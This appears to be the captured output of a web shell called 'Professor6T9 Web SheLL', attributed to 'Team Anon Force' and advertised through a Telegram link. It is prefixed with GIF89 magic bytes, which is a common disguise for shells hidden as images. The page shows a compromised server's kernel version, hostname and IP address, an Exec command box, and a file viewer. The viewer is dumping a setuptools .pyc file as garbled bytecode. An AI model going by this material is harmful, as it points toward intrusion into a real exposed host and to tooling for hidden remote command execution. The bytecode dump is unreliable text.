GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux 98.35.109.208.host.secureserver.net 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
Apache
208.109.35.98
/
lib
/
python3.9
/
site-packages
/
setuptools
/
__pycache__
[ HOME ]
Exec
Submit
File Name : __init__.cpython-39.pyc
a ���h � @ sH d Z ddlmZ ddlZddlZddlZddlZddlZ ddl mZ ddlm Z ddlmZ ddlZddlmZ dd lmZ dd lmZ ddlmZ g d�ZejjZdZd ZdgZG dd� d�Z G dd� de �Z!e j"Z#e!j"Z$dd� Z%dd� Z&e j'j&j e&_ e�(e j'j)�Z*G dd� de*�Z)dd� Z+ej,fdd�Z-G dd� de.�Z/e�0� dS )z@Extensions to the 'distutils' for large or complex distributions� ��fnmatchcaseN)�DistutilsOptionError)�convert_path� )�SetuptoolsDeprecationWarning)� Extension)�Distribution)�Require)�monkey)�setupr �Commandr r r � find_packages�find_namespace_packagesTz lib2to3.fixesc @ sB e Zd ZdZeddd��Zedd� �Zed d � �Zedd� �Z d S )� PackageFinderzI Generate a list of all Python packages found within a directory �.� ��*c C s, t | �t|�| jddg|�R � | j|� ��S )a Return a list all Python packages found within directory 'where' 'where' is the root directory which will be searched for packages. It should be supplied as a "cross-platform" (i.e. URL-style) path; it will be converted to the appropriate local path syntax. 'exclude' is a sequence of package names to exclude; '*' can be used as a wildcard in the names, such that 'foo.*' will exclude all subpackages of 'foo' (but not 'foo' itself). 'include' is a sequence of package names to include. If it's specified, only the named packages will be included. If it's not specified, all found packages will be included. 'include' can contain shell style wildcard patterns just like 'exclude'. Zez_setupz*__pycache__)�list�_find_packages_iterr � _build_filter)�cls�where�exclude�includer r �7/usr/lib/python3.9/site-packages/setuptools/__init__.py�find- s �zPackageFinder.findc c s� t j|dd�D ]�\}}}|dd� }g |dd�<